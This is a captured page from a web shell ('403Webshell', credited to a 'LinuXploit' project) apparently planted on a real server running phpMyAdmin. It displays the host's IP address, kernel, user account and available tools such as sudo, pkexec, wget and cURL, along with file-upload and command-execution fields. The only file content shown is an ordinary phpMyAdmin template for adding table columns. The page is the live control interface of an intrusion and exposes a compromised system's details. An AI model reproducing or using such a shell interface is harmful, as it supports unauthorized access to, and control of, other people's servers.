403Webshell
Server IP : 202.61.199.114  /  Your IP : 216.73.217.139
Web Server : nginx/1.22.1
System : Linux de.arni-solutions.de 6.1.0-49-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
User : web20 ( 1018)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/share/phpmyadmin/templates/table/structure/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/share/phpmyadmin/templates/table/structure/add_column.twig
<form method="post" action="tbl_addfield.php" id="addColumns" name="addColumns">
    {{ Url_getHiddenInputs(db, table) }}
    {% if Util_showIcons('ActionLinksMode') %}
        {{ Util_getImage('b_insrow', 'Add column'|trans) }}&nbsp;
    {% endif %}
    {% set num_fields -%}
        <input type="number" name="num_fields" value="1" onfocus="this.select()" min="1" required />
    {%- endset %}
    {{ 'Add %s column(s)'|trans|format(num_fields)|raw }}
    <input type="hidden" name="field_where" value="after"/>&nbsp;
    {# I tried displaying the drop-down inside the label but with Firefox the drop-down was blinking #}
    <select name="after_field">
        <option value="first" data-pos="first">
            {% trans 'at beginning of table' %}
        </option>
        {% for one_column_name in columns_list %}
            <option value="{{ one_column_name }}"
                {{- loop.revindex0 == 0 ? ' selected="selected"' }}>
                {{ 'after %s'|trans|format(one_column_name|e) }}
            </option>
        {% endfor %}
    </select>
    <input type="submit" value="{% trans 'Go' %}" />
</form>

Youez - 2016 - github.com/yon3zu
LinuXploit